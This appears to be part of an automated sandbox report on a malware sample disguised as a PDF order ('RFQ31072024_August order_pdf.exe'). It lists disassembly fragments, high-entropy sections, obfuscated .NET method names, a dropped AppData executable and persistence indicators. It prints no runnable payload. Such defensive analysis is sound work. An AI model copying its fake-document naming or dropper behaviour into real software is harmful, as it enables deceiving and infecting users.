Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_0236E522 pushfd ; iretd	0_2_0236E529
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_0236F3B5 push cs; retf	0_2_0236F425
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 0_2_0236B548 push 00000054h; retf	0_2_0236B55E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041710E pushfd ; retf	7_2_0041710F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00417AF4 push ebp; iretd	7_2_00417AF6
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041EB77 push dword ptr [66CEFF74h]; ret	7_2_0041EC10
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041A3A2 push cs; iretd	7_2_0041A3A3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00416402 push ebx; retf	7_2_00416405
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041EC11 push dword ptr [66CEFF74h]; ret	7_2_0041EC10
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041D4F2 push eax; ret	7_2_0041D4F8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041D4FB push eax; ret	7_2_0041D562
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041D4A5 push eax; ret	7_2_0041D4F8
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_004164AA push ss; ret	7_2_004164AB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041D55C push eax; ret	7_2_0041D562
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_00417D0C push esi; iretd	7_2_00417D1E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0041EEDD push dword ptr [66CEFF74h]; ret	7_2_0041EC10
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D09AD push ecx; mov dword ptr [esp], ecx	7_2_015D09B6
Source: C:\Windows\explorer.exe	Code function: 8_2_1004EB02 push esp; retn 0000h	8_2_1004EB03
Source: C:\Windows\explorer.exe	Code function: 8_2_1004EB1E push esp; retn 0000h	8_2_1004EB1F
Source: C:\Windows\explorer.exe	Code function: 8_2_1004E9B5 push esp; retn 0000h	8_2_1004EAE7
Source: C:\Windows\explorer.exe	Code function: 8_2_105669B5 push esp; retn 0000h	8_2_10566AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_10566B1E push esp; retn 0000h	8_2_10566B1F
Source: C:\Windows\explorer.exe	Code function: 8_2_10566B02 push esp; retn 0000h	8_2_10566B03
Source: C:\Windows\explorer.exe	Code function: 8_2_106E29B5 push esp; retn 0000h	8_2_106E2AE7
Source: C:\Windows\explorer.exe	Code function: 8_2_106E2B02 push esp; retn 0000h	8_2_106E2B03
Source: C:\Windows\explorer.exe	Code function: 8_2_106E2B1E push esp; retn 0000h	8_2_106E2B1F
Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe	Code function: 10_2_071889E8 push esp; iretd	10_2_071889E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_003F9F2D push ecx; ret	11_2_003F9F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_04BE09AD push ecx; mov dword ptr [esp], ecx	11_2_04BE09B6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0A3A2 push cs; iretd	11_2_02D0A3A3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02D0710E pushfd ; retf	11_2_02D0710F

Source: RFQ31072024_August order_pdf.exe	Static PE information: section name: .text entropy: 7.962079598462259
Source: EqtGqZpPskFq.exe.0.dr	Static PE information: section name: .text entropy: 7.962079598462259

Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, FiL8m0lbm4W5EOI5rq.cs	High entropy of concatenated method names: 'ToString', 'Q14GKOrn1m', 'ToyGlRFsYx', 'jKjGNimdY9', 'KKKGSyK0ME', 'QNCG9w7je6', 'OLoGCABHcR', 'RqdGPf5lYV', 'Te4Gd5W8cx', 'HYqGq97PcI'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, GVGvuYp61sslOjby4l.cs	High entropy of concatenated method names: 'CDSb7Vybt2', 'DFYbTiNlTZ', 'zFJb2AFr6l', 'P6jblA8bb4', 'O5RbSb8lBH', 'nEEb9cXS7O', 'WtibPmQpE5', 'Up8bdQ2Nor', 'l2WbJo9IKJ', 'D5mbKMEfKh'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, EB5k8mh4YtHp1Ovo0b.cs	High entropy of concatenated method names: 'KTpt2uVDXg', 'DNLtlvfpLl', 'MgMtN1CYO6', 'tnmtSxDli3', 'b8VtUdi5uW', 'DkCt9Fgof3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, nRvS2nXlneD5YU2lPc.cs	High entropy of concatenated method names: 'f5UWZwytva', 'QU1WrXXlHt', 'MdbW7m4KIc', 'p6dWTFltPw', 'GEJWa2nx1f', 'SxAWGXa4cL', 'SAhWXwErhk', 'E94Wtl0Vmb', 'pnKW6k16ul', 'yuFWsIFNRm'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, maqqNNA9gEJFliXCYp.cs	High entropy of concatenated method names: 'CIEQD9aaAf', 'IbLQy6eyDE', 'CE0QY3sCUg', 'QpnQZBBAjw', 'wKDQuky5I4', 'nTWQrHfj50', 'kryQvQg4hR', 'WngQ7A2Abm', 'LqkQT6pZSq', 'QdFQ196GCL'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, toh8Y5c2aMoMJb299k4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XfDsU4wsaU', 'tvEsffDMW8', 'bUEso2Jhbg', 'FXmsj1ybgX', 'jToswMconW', 'XMisiDAaMF', 'spus4iisst'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, OacuuyNe9agFKFYACY.cs	High entropy of concatenated method names: 'XhMpuwXcxD', 'e77pv003nZ', 'mppWNKgb3P', 'BZsWSPxK3X', 'vYeW90BwSy', 'iDhWCqp1ZD', 'drYWPqBSZf', 'YsTWdx99lr', 'exuWqSedcx', 'kyNWJ7c3Hv'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, ugv3wT9KpNkr14yb7a.cs	High entropy of concatenated method names: 'VgdQ5y2anw', 'LKeQWyrNXn', 'iumQ8trpte', 'FuE8H6gglf', 'cqJ8zo0rH3', 'z1HQh2jAj3', 'SI0QeCwMce', 'CUnQxPK9Wa', 'bClQ0ifqlP', 'ymNQBNytIO'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, yJlEyEUkF5vebMXfou.cs	High entropy of concatenated method names: 'rlI8EIEpww', 'yt88giBO1P', 'HBw8p43A5E', 'CKJ8QkM7jq', 'cNK8FenX5K', 'OScpwaVuPl', 'jhIpin7W1h', 'F2mp42eRVh', 'jHgpOcClkT', 'NdTpADnFv1'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, RtVBnqFKfMXLSCerqs.cs	High entropy of concatenated method names: 'oZK0E5YPQA', 'Vy105jJ1XM', 'c050g18JoV', 'HMp0WvvTpy', 'Wc80pEMFmq', 'tVr08ZFGoS', 'I5A0QKoMkY', 'd800FNwZmN', 'fY00RcCDji', 'hXN0kc3J8y'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, q8NtcOnnVWYp5xDu0b.cs	High entropy of concatenated method names: 'yW7Xkrl5EN', 'VJJX3LsscP', 'ToString', 'jTZX5KxBnN', 'ziTXgPmqjO', 'vYQXWC3mNP', 'Qk2XpD0es8', 'NQiX89L7S5', 'y31XQ6fPlO', 'J5KXFMIBQB'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, VrLLVLmk06Yjj6vkBR.cs	High entropy of concatenated method names: 'cTe6exvFnD', 'SSG60Oerap', 'L326BaIF0q', 's9I65pSwmY', 'O4I6gGeux2', 'hjN6pQwxdE', 'yeg68RfHy2', 'RtQt4VKWbd', 'DVhtOwkeNo', 'XwAtAZg2U8'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, gPU9Q8dZ2gavAiGNW6.cs	High entropy of concatenated method names: 'wPRt5dkO33', 'X4ktgtYgDa', 'FcDtWeWmWu', 'ywTtpiVwCO', 'K85t82DAfg', 'Tt2tQMv57r', 'Od0tFTJwbX', 'VCctR9kmrj', 'oautkpiu8V', 'LJMt3b51FM'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, A7WggCyQra3W5WQ1Jc.cs	High entropy of concatenated method names: 'iaIeQKuNDR', 'mCaeFW92P1', 'dNDekAgkPm', 'MVJe3lZag7', 'uqceao7xgo', 'bk5eGcxEpU', 'kwHeVpolx9Id2vAfXT', 'GyT0LBkAgNgXdU80Te', 'mFreeUPwep', 'i1ce0O5Erh'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, zLtd9E7MtR7J8ZYD8q.cs	High entropy of concatenated method names: 'vn3XOVisE8', 'D13XHVhHLG', 'mBZthiu4ND', 'prEteOksp3', 'kPYXKxnbFS', 'MqPXmnQoAs', 'RaDXIiJywq', 'GfCXUfQTrF', 'pwhXfxowpX', 'SgdXompRrD'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, iFuU53ci3ZD8kuBwMcS.cs	High entropy of concatenated method names: 'vGa6DRSW2p', 'JmG6ytAMFt', 'rCu6YrbCtZ', 'U4g6Z3ig0f', 'bbT6utx7cW', 'pCX6rBPCRj', 'GVU6v00eGY', 'AqU67lnlte', 'XCD6Tej7SQ', 'KFY619hKvI'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, a2FbTp8xY7SFAYgAjX.cs	High entropy of concatenated method names: 'uj9gUuPYDZ', 'hxagf4VxBJ', 'nYwgo3Yn0u', 'JUDgjSlAHd', 'ClMgwNIj8E', 'wumgicOg25', 'hd2g4a0Yod', 'LVVgOr1eTR', 'INOgAcmBtn', 'G8kgHU036p'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, H0m29Zx5GF2kgJCGga.cs	High entropy of concatenated method names: 'gEKYeY0OW', 'GLlZJ8cLL', 'IOtrKpTWW', 'uQXvOZOcZ', 'rVHTjnC9h', 'hqf13YJfw', 'PoPIHR1S0hGwsXXwdU', 'MRXNcP5M8Vt4x50FQI', 'mQZtOAY6k', 'mFysSgRi4'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, hP9MoTQkONJrM3TO8h.cs	High entropy of concatenated method names: 'XxYaJ8O7ti', 'J3famiEM9g', 'pvIaU2tMyf', 'ELiafvR41g', 'KwBalsT2pu', 'egPaNDOHCS', 'YIvaSOA5PY', 'IJJa9ye8Yp', 'ociaCwUahH', 'JpXaPJodHt'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, A5ZjehbkoXNkGW1svh.cs	High entropy of concatenated method names: 'zlq0hvVT1Z3Z4YXHyCF', 'Luo34kVfmUKMHYJF7Ad', 'Uq78tDkhjG', 'GL586JYAuX', 'EAU8ss1hBc', 'tePHp1VQR6L3SmwBsnJ', 'pFfYaDVn8RDKPqfEL8D'
Source: 0.2.RFQ31072024_August order_pdf.exe.38a0670.6.raw.unpack, G9h3rlj0oOIqenKGSb.cs	High entropy of concatenated method names: 'Dispose', 'XMaeAxTUvw', 'P0OxlBRUuX', 'XA4LLOjnBI', 'vgJeH4BQsa', 'ifjezO2CgZ', 'ProcessDialogKey', 'fivxhUf0ps', 'gy4xeM10HR', 'dOFxxtT4QY'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, FiL8m0lbm4W5EOI5rq.cs	High entropy of concatenated method names: 'ToString', 'Q14GKOrn1m', 'ToyGlRFsYx', 'jKjGNimdY9', 'KKKGSyK0ME', 'QNCG9w7je6', 'OLoGCABHcR', 'RqdGPf5lYV', 'Te4Gd5W8cx', 'HYqGq97PcI'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, GVGvuYp61sslOjby4l.cs	High entropy of concatenated method names: 'CDSb7Vybt2', 'DFYbTiNlTZ', 'zFJb2AFr6l', 'P6jblA8bb4', 'O5RbSb8lBH', 'nEEb9cXS7O', 'WtibPmQpE5', 'Up8bdQ2Nor', 'l2WbJo9IKJ', 'D5mbKMEfKh'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, EB5k8mh4YtHp1Ovo0b.cs	High entropy of concatenated method names: 'KTpt2uVDXg', 'DNLtlvfpLl', 'MgMtN1CYO6', 'tnmtSxDli3', 'b8VtUdi5uW', 'DkCt9Fgof3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, nRvS2nXlneD5YU2lPc.cs	High entropy of concatenated method names: 'f5UWZwytva', 'QU1WrXXlHt', 'MdbW7m4KIc', 'p6dWTFltPw', 'GEJWa2nx1f', 'SxAWGXa4cL', 'SAhWXwErhk', 'E94Wtl0Vmb', 'pnKW6k16ul', 'yuFWsIFNRm'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, maqqNNA9gEJFliXCYp.cs	High entropy of concatenated method names: 'CIEQD9aaAf', 'IbLQy6eyDE', 'CE0QY3sCUg', 'QpnQZBBAjw', 'wKDQuky5I4', 'nTWQrHfj50', 'kryQvQg4hR', 'WngQ7A2Abm', 'LqkQT6pZSq', 'QdFQ196GCL'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, toh8Y5c2aMoMJb299k4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XfDsU4wsaU', 'tvEsffDMW8', 'bUEso2Jhbg', 'FXmsj1ybgX', 'jToswMconW', 'XMisiDAaMF', 'spus4iisst'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, OacuuyNe9agFKFYACY.cs	High entropy of concatenated method names: 'XhMpuwXcxD', 'e77pv003nZ', 'mppWNKgb3P', 'BZsWSPxK3X', 'vYeW90BwSy', 'iDhWCqp1ZD', 'drYWPqBSZf', 'YsTWdx99lr', 'exuWqSedcx', 'kyNWJ7c3Hv'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, ugv3wT9KpNkr14yb7a.cs	High entropy of concatenated method names: 'VgdQ5y2anw', 'LKeQWyrNXn', 'iumQ8trpte', 'FuE8H6gglf', 'cqJ8zo0rH3', 'z1HQh2jAj3', 'SI0QeCwMce', 'CUnQxPK9Wa', 'bClQ0ifqlP', 'ymNQBNytIO'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, yJlEyEUkF5vebMXfou.cs	High entropy of concatenated method names: 'rlI8EIEpww', 'yt88giBO1P', 'HBw8p43A5E', 'CKJ8QkM7jq', 'cNK8FenX5K', 'OScpwaVuPl', 'jhIpin7W1h', 'F2mp42eRVh', 'jHgpOcClkT', 'NdTpADnFv1'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, RtVBnqFKfMXLSCerqs.cs	High entropy of concatenated method names: 'oZK0E5YPQA', 'Vy105jJ1XM', 'c050g18JoV', 'HMp0WvvTpy', 'Wc80pEMFmq', 'tVr08ZFGoS', 'I5A0QKoMkY', 'd800FNwZmN', 'fY00RcCDji', 'hXN0kc3J8y'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, q8NtcOnnVWYp5xDu0b.cs	High entropy of concatenated method names: 'yW7Xkrl5EN', 'VJJX3LsscP', 'ToString', 'jTZX5KxBnN', 'ziTXgPmqjO', 'vYQXWC3mNP', 'Qk2XpD0es8', 'NQiX89L7S5', 'y31XQ6fPlO', 'J5KXFMIBQB'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, VrLLVLmk06Yjj6vkBR.cs	High entropy of concatenated method names: 'cTe6exvFnD', 'SSG60Oerap', 'L326BaIF0q', 's9I65pSwmY', 'O4I6gGeux2', 'hjN6pQwxdE', 'yeg68RfHy2', 'RtQt4VKWbd', 'DVhtOwkeNo', 'XwAtAZg2U8'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, gPU9Q8dZ2gavAiGNW6.cs	High entropy of concatenated method names: 'wPRt5dkO33', 'X4ktgtYgDa', 'FcDtWeWmWu', 'ywTtpiVwCO', 'K85t82DAfg', 'Tt2tQMv57r', 'Od0tFTJwbX', 'VCctR9kmrj', 'oautkpiu8V', 'LJMt3b51FM'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, A7WggCyQra3W5WQ1Jc.cs	High entropy of concatenated method names: 'iaIeQKuNDR', 'mCaeFW92P1', 'dNDekAgkPm', 'MVJe3lZag7', 'uqceao7xgo', 'bk5eGcxEpU', 'kwHeVpolx9Id2vAfXT', 'GyT0LBkAgNgXdU80Te', 'mFreeUPwep', 'i1ce0O5Erh'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, zLtd9E7MtR7J8ZYD8q.cs	High entropy of concatenated method names: 'vn3XOVisE8', 'D13XHVhHLG', 'mBZthiu4ND', 'prEteOksp3', 'kPYXKxnbFS', 'MqPXmnQoAs', 'RaDXIiJywq', 'GfCXUfQTrF', 'pwhXfxowpX', 'SgdXompRrD'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, iFuU53ci3ZD8kuBwMcS.cs	High entropy of concatenated method names: 'vGa6DRSW2p', 'JmG6ytAMFt', 'rCu6YrbCtZ', 'U4g6Z3ig0f', 'bbT6utx7cW', 'pCX6rBPCRj', 'GVU6v00eGY', 'AqU67lnlte', 'XCD6Tej7SQ', 'KFY619hKvI'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, a2FbTp8xY7SFAYgAjX.cs	High entropy of concatenated method names: 'uj9gUuPYDZ', 'hxagf4VxBJ', 'nYwgo3Yn0u', 'JUDgjSlAHd', 'ClMgwNIj8E', 'wumgicOg25', 'hd2g4a0Yod', 'LVVgOr1eTR', 'INOgAcmBtn', 'G8kgHU036p'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, H0m29Zx5GF2kgJCGga.cs	High entropy of concatenated method names: 'gEKYeY0OW', 'GLlZJ8cLL', 'IOtrKpTWW', 'uQXvOZOcZ', 'rVHTjnC9h', 'hqf13YJfw', 'PoPIHR1S0hGwsXXwdU', 'MRXNcP5M8Vt4x50FQI', 'mQZtOAY6k', 'mFysSgRi4'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, hP9MoTQkONJrM3TO8h.cs	High entropy of concatenated method names: 'XxYaJ8O7ti', 'J3famiEM9g', 'pvIaU2tMyf', 'ELiafvR41g', 'KwBalsT2pu', 'egPaNDOHCS', 'YIvaSOA5PY', 'IJJa9ye8Yp', 'ociaCwUahH', 'JpXaPJodHt'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, A5ZjehbkoXNkGW1svh.cs	High entropy of concatenated method names: 'zlq0hvVT1Z3Z4YXHyCF', 'Luo34kVfmUKMHYJF7Ad', 'Uq78tDkhjG', 'GL586JYAuX', 'EAU8ss1hBc', 'tePHp1VQR6L3SmwBsnJ', 'pFfYaDVn8RDKPqfEL8D'
Source: 0.2.RFQ31072024_August order_pdf.exe.6980000.10.raw.unpack, G9h3rlj0oOIqenKGSb.cs	High entropy of concatenated method names: 'Dispose', 'XMaeAxTUvw', 'P0OxlBRUuX', 'XA4LLOjnBI', 'vgJeH4BQsa', 'ifjezO2CgZ', 'ProcessDialogKey', 'fivxhUf0ps', 'gy4xeM10HR', 'dOFxxtT4QY'
Source: 0.2.RFQ31072024_August order_pdf.exe.2514450.1.raw.unpack, JwlrlmCCKvmG8rWaC9.cs	High entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, FiL8m0lbm4W5EOI5rq.cs	High entropy of concatenated method names: 'ToString', 'Q14GKOrn1m', 'ToyGlRFsYx', 'jKjGNimdY9', 'KKKGSyK0ME', 'QNCG9w7je6', 'OLoGCABHcR', 'RqdGPf5lYV', 'Te4Gd5W8cx', 'HYqGq97PcI'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, GVGvuYp61sslOjby4l.cs	High entropy of concatenated method names: 'CDSb7Vybt2', 'DFYbTiNlTZ', 'zFJb2AFr6l', 'P6jblA8bb4', 'O5RbSb8lBH', 'nEEb9cXS7O', 'WtibPmQpE5', 'Up8bdQ2Nor', 'l2WbJo9IKJ', 'D5mbKMEfKh'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, EB5k8mh4YtHp1Ovo0b.cs	High entropy of concatenated method names: 'KTpt2uVDXg', 'DNLtlvfpLl', 'MgMtN1CYO6', 'tnmtSxDli3', 'b8VtUdi5uW', 'DkCt9Fgof3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, nRvS2nXlneD5YU2lPc.cs	High entropy of concatenated method names: 'f5UWZwytva', 'QU1WrXXlHt', 'MdbW7m4KIc', 'p6dWTFltPw', 'GEJWa2nx1f', 'SxAWGXa4cL', 'SAhWXwErhk', 'E94Wtl0Vmb', 'pnKW6k16ul', 'yuFWsIFNRm'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, maqqNNA9gEJFliXCYp.cs	High entropy of concatenated method names: 'CIEQD9aaAf', 'IbLQy6eyDE', 'CE0QY3sCUg', 'QpnQZBBAjw', 'wKDQuky5I4', 'nTWQrHfj50', 'kryQvQg4hR', 'WngQ7A2Abm', 'LqkQT6pZSq', 'QdFQ196GCL'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, toh8Y5c2aMoMJb299k4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XfDsU4wsaU', 'tvEsffDMW8', 'bUEso2Jhbg', 'FXmsj1ybgX', 'jToswMconW', 'XMisiDAaMF', 'spus4iisst'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, OacuuyNe9agFKFYACY.cs	High entropy of concatenated method names: 'XhMpuwXcxD', 'e77pv003nZ', 'mppWNKgb3P', 'BZsWSPxK3X', 'vYeW90BwSy', 'iDhWCqp1ZD', 'drYWPqBSZf', 'YsTWdx99lr', 'exuWqSedcx', 'kyNWJ7c3Hv'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, ugv3wT9KpNkr14yb7a.cs	High entropy of concatenated method names: 'VgdQ5y2anw', 'LKeQWyrNXn', 'iumQ8trpte', 'FuE8H6gglf', 'cqJ8zo0rH3', 'z1HQh2jAj3', 'SI0QeCwMce', 'CUnQxPK9Wa', 'bClQ0ifqlP', 'ymNQBNytIO'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, yJlEyEUkF5vebMXfou.cs	High entropy of concatenated method names: 'rlI8EIEpww', 'yt88giBO1P', 'HBw8p43A5E', 'CKJ8QkM7jq', 'cNK8FenX5K', 'OScpwaVuPl', 'jhIpin7W1h', 'F2mp42eRVh', 'jHgpOcClkT', 'NdTpADnFv1'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, RtVBnqFKfMXLSCerqs.cs	High entropy of concatenated method names: 'oZK0E5YPQA', 'Vy105jJ1XM', 'c050g18JoV', 'HMp0WvvTpy', 'Wc80pEMFmq', 'tVr08ZFGoS', 'I5A0QKoMkY', 'd800FNwZmN', 'fY00RcCDji', 'hXN0kc3J8y'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, q8NtcOnnVWYp5xDu0b.cs	High entropy of concatenated method names: 'yW7Xkrl5EN', 'VJJX3LsscP', 'ToString', 'jTZX5KxBnN', 'ziTXgPmqjO', 'vYQXWC3mNP', 'Qk2XpD0es8', 'NQiX89L7S5', 'y31XQ6fPlO', 'J5KXFMIBQB'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, VrLLVLmk06Yjj6vkBR.cs	High entropy of concatenated method names: 'cTe6exvFnD', 'SSG60Oerap', 'L326BaIF0q', 's9I65pSwmY', 'O4I6gGeux2', 'hjN6pQwxdE', 'yeg68RfHy2', 'RtQt4VKWbd', 'DVhtOwkeNo', 'XwAtAZg2U8'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, gPU9Q8dZ2gavAiGNW6.cs	High entropy of concatenated method names: 'wPRt5dkO33', 'X4ktgtYgDa', 'FcDtWeWmWu', 'ywTtpiVwCO', 'K85t82DAfg', 'Tt2tQMv57r', 'Od0tFTJwbX', 'VCctR9kmrj', 'oautkpiu8V', 'LJMt3b51FM'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, A7WggCyQra3W5WQ1Jc.cs	High entropy of concatenated method names: 'iaIeQKuNDR', 'mCaeFW92P1', 'dNDekAgkPm', 'MVJe3lZag7', 'uqceao7xgo', 'bk5eGcxEpU', 'kwHeVpolx9Id2vAfXT', 'GyT0LBkAgNgXdU80Te', 'mFreeUPwep', 'i1ce0O5Erh'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, zLtd9E7MtR7J8ZYD8q.cs	High entropy of concatenated method names: 'vn3XOVisE8', 'D13XHVhHLG', 'mBZthiu4ND', 'prEteOksp3', 'kPYXKxnbFS', 'MqPXmnQoAs', 'RaDXIiJywq', 'GfCXUfQTrF', 'pwhXfxowpX', 'SgdXompRrD'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, iFuU53ci3ZD8kuBwMcS.cs	High entropy of concatenated method names: 'vGa6DRSW2p', 'JmG6ytAMFt', 'rCu6YrbCtZ', 'U4g6Z3ig0f', 'bbT6utx7cW', 'pCX6rBPCRj', 'GVU6v00eGY', 'AqU67lnlte', 'XCD6Tej7SQ', 'KFY619hKvI'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, a2FbTp8xY7SFAYgAjX.cs	High entropy of concatenated method names: 'uj9gUuPYDZ', 'hxagf4VxBJ', 'nYwgo3Yn0u', 'JUDgjSlAHd', 'ClMgwNIj8E', 'wumgicOg25', 'hd2g4a0Yod', 'LVVgOr1eTR', 'INOgAcmBtn', 'G8kgHU036p'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, H0m29Zx5GF2kgJCGga.cs	High entropy of concatenated method names: 'gEKYeY0OW', 'GLlZJ8cLL', 'IOtrKpTWW', 'uQXvOZOcZ', 'rVHTjnC9h', 'hqf13YJfw', 'PoPIHR1S0hGwsXXwdU', 'MRXNcP5M8Vt4x50FQI', 'mQZtOAY6k', 'mFysSgRi4'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, hP9MoTQkONJrM3TO8h.cs	High entropy of concatenated method names: 'XxYaJ8O7ti', 'J3famiEM9g', 'pvIaU2tMyf', 'ELiafvR41g', 'KwBalsT2pu', 'egPaNDOHCS', 'YIvaSOA5PY', 'IJJa9ye8Yp', 'ociaCwUahH', 'JpXaPJodHt'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, A5ZjehbkoXNkGW1svh.cs	High entropy of concatenated method names: 'zlq0hvVT1Z3Z4YXHyCF', 'Luo34kVfmUKMHYJF7Ad', 'Uq78tDkhjG', 'GL586JYAuX', 'EAU8ss1hBc', 'tePHp1VQR6L3SmwBsnJ', 'pFfYaDVn8RDKPqfEL8D'
Source: 0.2.RFQ31072024_August order_pdf.exe.3830a50.7.raw.unpack, G9h3rlj0oOIqenKGSb.cs	High entropy of concatenated method names: 'Dispose', 'XMaeAxTUvw', 'P0OxlBRUuX', 'XA4LLOjnBI', 'vgJeH4BQsa', 'ifjezO2CgZ', 'ProcessDialogKey', 'fivxhUf0ps', 'gy4xeM10HR', 'dOFxxtT4QY'
Source: 0.2.RFQ31072024_August order_pdf.exe.6960000.9.raw.unpack, JwlrlmCCKvmG8rWaC9.cs	High entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe

File created: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe

Jump to dropped file

Boot Survival

